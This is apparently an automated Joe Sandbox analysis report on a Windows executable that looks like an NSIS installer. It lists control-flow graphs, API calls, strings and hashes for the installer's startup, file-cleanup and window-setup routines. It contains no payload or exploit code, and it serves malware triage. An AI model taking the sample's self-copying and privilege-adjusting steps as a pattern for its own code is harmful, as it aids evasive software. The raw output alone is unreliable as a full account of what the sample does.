4554 405c60 71 API calls 4553->4554 4555 401976 4554->4555 4556 401934 4557 402dcb 21 API calls 4556->4557 4558 40193b 4557->4558 4559 405bb4 MessageBoxIndirectW 4558->4559 4560 401944 4559->4560 4561 4028b6 4562 4028bd 4561->4562 4564 402bce 4561->4564 4563 402da9 21 API calls 4562->4563 4565 4028c4 4563->4565 4566 4028d3 SetFilePointer 4565->4566 4566->4564 4567 4028e3 4566->4567 4569 40649b wsprintfW 4567->4569 4569->4564 4570 401f37 4571 402dcb 21 API calls 4570->4571 4572 401f3d 4571->4572 4573 402dcb 21 API calls 4572->4573 4574 401f46 4573->4574 4575 402dcb 21 API calls 4574->4575 4576 401f4f 4575->4576 4577 402dcb 21 API calls 4576->4577 4578 401f58 4577->4578 4579 401423 28 API calls 4578->4579 4580 401f5f 4579->4580 4587 405b7a ShellExecuteExW 4580->4587 4582 401fa7 4583 4069f3 5 API calls 4582->4583 4584 402953 4582->4584 4585 401fc4 CloseHandle 4583->4585 4585->4584 4587->4582 4588 402fb8 4589 402fe3 4588->4589 4590 402fca SetTimer 4588->4590 4591 403038 4589->4591 4592 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4589->4592 4590->4589 4592->4591 4593 4014b8 4594 4014be 4593->4594 4595 401389 2 API calls 4594->4595 4596 4014c6 4595->4596 4597 401d3c 4598 402da9 21 API calls 4597->4598 4599 401d42 IsWindow 4598->4599 4600 401a45 4599->4600

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 11 403616 5->11 8 403622-403636 call 4068d8 lstrlenA 6->8 13 403638-403654 call 406948 * 3 8->13 11->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 25 40365e 21->25 25->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 35 4036f3-4036f8 33->35 36 4036fa-403701 33->36 37 403801-40381b GetTempPathW call 4034fe 34->37 35->35 35->36 38 403703-403708 36->38 39 403709-40370d 36->39 47 403873-40388d DeleteFileW call 4030a2 37->47 48 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 37->48 38->39 41 403713-403719 39->41 42 4037ce-4037dd call 405e50 39->42 45 403733-40376c 41->45 46 40371b-403722 41->46 42->32 59 4037df-4037e0 42->59 53 403789-4037c3 45->53 54 40376e-403773 45->54 51 403724-403727 46->51 52 403729 46->52 64 403893-403899 47->64 65 403a7a-403a8a ExitProcess CoUninitialize 47->65 48->47 62 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 48->62 51->45 51->52 52->45 57 4037c5-4037c9 53->57 58 4037cb-4037cd 53->58 54->53 61 403775-40377d 54->61 57->58 63 4037ef-4037fc call 406554 57->63 58->42 59->32 66 403784 61->66 67 40377f-403782 61->67 62->47 62->65 63->37 71 403932-403939 call 403c26 64->71 72 40389f-4038aa call 405e50 64->72 69 403ab0-403ab6 65->69 70 403a8c-403a9c call 405bb4 ExitProcess 65->70 66->53 67->53 67->66 77 403b34-403b3c 69->77 78 403ab8-403ace GetCurrentProcess OpenProcessToken 69->78 86 40393e-403942 71->86 87 4038f8-403902 72->87 88 4038ac-4038e1 72->88 80 403b42-403b46 ExitProcess 77->80 81 403b3e 77->81 84 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403b04-403b12 call 406948 78->85 81->80 84->85 98 403b20-403b2b ExitWindowsEx 85->98 99 403b14-403b1e 85->99 86->65 90 403904-403912 call 405f2b 87->90 91 403947-40396d call 405b1f lstrlenW call 406554 87->91 92 4038e3-4038e7 88->92 90->65 105 403918-40392e call 406554 * 2 90->105 110 40397e-403996 91->110 111 40396f-403979 call 406554 91->111 96 4038f0-4038f4 92->96 97 4038e9-4038ee 92->97 96->92 103 4038f6 96->103 97->96 97->103 98->77 101 403b2d-403b2f call 40140b 98->101 99->98 99->101 101->77 103->87 105->71 114 40399b-40399f 110->114 111->110 116 4039a4-4039ce wsprintfW call 406591 114->116 120 4039d0-4039d5 call 405aa8 116->120 121 4039d7 call 405b02 116->121 125 4039dc-4039de 120->125 121->125 126 4039e0-4039ea GetFileAttributesW 125->126 127 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 125->127 129 403a0b-403a16 126->129 130 4039ec-4039f5 DeleteFileW 126->130 135 403a78 127->135 136 403a3b-403a5c call 406314 call 406591 call 405b37 127->136 129->114 132 403a18 129->132 130->129 131 4039f7-403a09 call 405c60 130->131 131->116 131->129 132->65 135->65 144 403aa2-403aae CloseHandle 136->144 145 403a5e-403a68 136->145 144->135 145->135 146 403a6a-403a72 call 4068b1 145->146 146->116 146->135
                                  APIs
                                  • SetErrorMode.KERNELBASE ref: 00403552
                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040357D
                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403590
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403629
                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403666
                                  • OleInitialize.OLE32(00000000), ref: 0040366D
                                  • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                  • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A1
                                  • CharNextW.USER32(00000000,007B3000,00000020,007B3000,00000000,?,00000008,0000000A,0000000C), ref: 004036DA
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403812
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040382F
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403843
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384B
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385C
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403864
                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403878
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B3000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403951
                                    • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                  • wsprintfW.USER32 ref: 004039AE
                                  • GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039E1
                                  • DeleteFileW.KERNEL32(007AB800), ref: 004039ED
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1B
                                    • Part of subcall function 00406314: MoveFileExW.KERNELBASE(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\KYagm8gq5S.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31
                                    • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B60
                                    • Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B6D
                                    • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(74DF3420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                    • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                  • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7A
                                  • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7F
                                  • ExitProcess.KERNEL32 ref: 00403A9C
                                  • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403AA3
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403ABF
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC6
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AFE
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                  • ExitProcess.KERNEL32 ref: 00403B46
                                    • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\KYagm8gq5S.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                  • API String ID: 2017177436-3456020372
                                  • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                  • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                  • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                  • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 289 405c60-405c86 call 405f2b 292 405c88-405c9a DeleteFileW 289->292 293 405c9f-405ca6 289->293 294 405e1c-405e20 292->294 295 405ca8-405caa 293->295 296 405cb9-405cc9 call 406554 293->296 297 405cb0-405cb3 295->297 298 405dca-405dcf 295->298 302 405cd8-405cd9 call 405e6f 296->302 303 405ccb-405cd6 lstrcatW 296->303 297->296 297->298 298->294 301 405dd1-405dd4 298->301 304 405dd6-405ddc 301->304 305 405dde-405de6 call 4068b1 301->305 306 405cde-405ce2 302->306 303->306 304->294 305->294 313 405de8-405dfc call 405e23 call 405c18 305->313 309 405ce4-405cec 306->309 310 405cee-405cf4 lstrcatW 306->310 309->310 312 405cf9-405d15 lstrlenW FindFirstFileW 309->312 310->312 314 405d1b-405d23 312->314 315 405dbf-405dc3 312->315 329 405e14-405e17 call 4055d9 313->329 330 405dfe-405e01 313->330 318 405d43-405d57 call 406554 314->318 319 405d25-405d2d 314->319 315->298 317 405dc5 315->317 317->298 331 405d59-405d61 318->331 332 405d6e-405d79 call 405c18 318->332 322 405da2-405db2 FindNextFileW 319->322 323 405d2f-405d37 319->323 322->314 327 405db8-405db9 FindClose 322->327 323->318 328 405d39-405d41 323->328 327->315 328->318 328->322 329->294 330->304 333 405e03-405e12 call 4055d9 call 406314 330->333 331->322 334 405d63-405d6c call 405c60 331->334 342 405d9a-405d9d call 4055d9 332->342 343 405d7b-405d7e 332->343 333->294 334->322 342->322 346 405d80-405d90 call 4055d9 call 406314 343->346 347 405d92-405d98 343->347 346->322 347->322
                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405C89
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CD1
                                  • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CF4
                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CFA
                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405D0A
                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAA
                                  • FindClose.KERNEL32(00000000), ref: 00405DB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*$\*.*
                                  • API String ID: 2035342205-3164024899
                                  • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                  • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                  • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                  • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                  APIs
                                  • FindFirstFileW.KERNELBASE(74DF3420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                  • FindClose.KERNEL32(00000000), ref: 004068C8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0
                                  • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                  • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                  • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                  • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 149 403c26-403c3e call 406948 152 403c40-403c4b GetUserDefaultUILanguage call 40649b 149->152 153 403c52-403c89 call 406422 149->153 157 403c50 152->157 158 403ca1-403ca7 lstrcatW 153->158 159 403c8b-403c9c call 406422 153->159 160 403cac-403cd5 call 403efc call 405f2b 157->160 158->160 159->158 166 403d67-403d6f call 405f2b 160->166 167 403cdb-403ce0 160->167 173 403d71-403d78 call 406591 166->173 174 403d7d-403da2 LoadImageW 166->174 167->166 168 403ce6-403d0e call 406422 167->168 168->166 178 403d10-403d14 168->178 173->174 176 403e23-403e2b call 40140b 174->176 177 403da4-403dd4 RegisterClassW 174->177 191 403e35-403e40 call 403efc 176->191 192 403e2d-403e30 176->192 179 403ef2 177->179 180 403dda-403e1e SystemParametersInfoW CreateWindowExW 177->180 182 403d26-403d32 lstrlenW 178->182 183 403d16-403d23 call 405e50 178->183 185 403ef4-403efb 179->185 180->176 186 403d34-403d42 lstrcmpiW 182->186 187 403d5a-403d62 call 405e23 call 406554 182->187 183->182 186->187 190 403d44-403d4e GetFileAttributesW 186->190 187->166 194 403d50-403d52 190->194 195 403d54-403d55 call 405e6f 190->195 201 403e46-403e60 ShowWindow call 4068d8 191->201 202 403ec9-403ed1 call 4056ac 191->202 192->185 194->187 194->195 195->187 209 403e62-403e67 call 4068d8 201->209 210 403e6c-403e7e GetClassInfoW 201->210 207 403ed3-403ed9 202->207 208 403eeb-403eed call 40140b 202->208 207->192 213 403edf-403ee6 call 40140b 207->213 208->179 209->210 211 403e80-403e90 GetClassInfoW RegisterClassW 210->211 212 403e96-403ec7 DialogBoxParamW call 40140b call 403b76 210->212 211->212 212->185 213->192
                                  APIs
                                    • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
                                    • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403C40
                                    • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                  • lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403CA7
                                  • lstrlenW.KERNEL32(Del,?,?,?,Del,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,74DF3420), ref: 00403D27
                                  • lstrcmpiW.KERNEL32(?,.exe,Del,?,?,?,Del,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                  • GetFileAttributesW.KERNEL32(Del), ref: 00403D45
                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D8E
                                  • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
                                  • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                  • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                  • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                  • RegisterClassW.USER32(007A7200), ref: 00403E90
                                  • DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Del$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                  • API String ID: 606308-2615572121
                                  • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                  • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                  • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                  • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 222 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 225 4030f2-4030f7 222->225 226 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 222->226 227 4032d2-4032d6 225->227 234 403130 226->234 235 403215-403223 call 40303e 226->235 237 403135-40314c 234->237 241 403225-403228 235->241 242 403278-40327d 235->242 239 403150-403159 call 4034d1 237->239 240 40314e 237->240 248 40327f-403287 call 40303e 239->248 249 40315f-403166 239->249 240->239 244 40322a-403242 call 4034e7 call 4034d1 241->244 245 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 241->245 242->227 244->242 268 403244-40324a 244->268 245->242 273 403289-40329a 245->273 248->242 253 4031e2-4031e6 249->253 254 403168-40317c call 405fff 249->254 258 4031f0-4031f6 253->258 259 4031e8-4031ef call 40303e 253->259 254->258 271 40317e-403185 254->271 264 403205-40320d 258->264 265 4031f8-403202 call 406a35 258->265 259->258 264->237 272 403213 264->272 265->264 268->242 268->245 271->258 277 403187-40318e 271->277 272->235 274 4032a2-4032a7 273->274 275 40329c 273->275 278 4032a8-4032ae 274->278 275->274 277->258 279 403190-403197 277->279 278->278 281 4032b0-4032cb SetFilePointer call 405fff 278->281 279->258 280 403199-4031a0 279->280 280->258 282 4031a2-4031c2 280->282 285 4032d0 281->285 282->242 284 4031c8-4031cc 282->284 286 4031d4-4031dc 284->286 287 4031ce-4031d2 284->287 285->227 286->258 288 4031de-4031e0 286->288 287->272 287->286 288->258
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 004030B3
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KYagm8gq5S.exe,00000400), ref: 004030CF
                                    • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00406048
                                    • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                  • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KYagm8gq5S.exe,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 0040311B
                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KYagm8gq5S.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 2803837635-1859292856
                                  • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                  • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                  • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                  • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                  Control-flow Graph

                                  • Executed
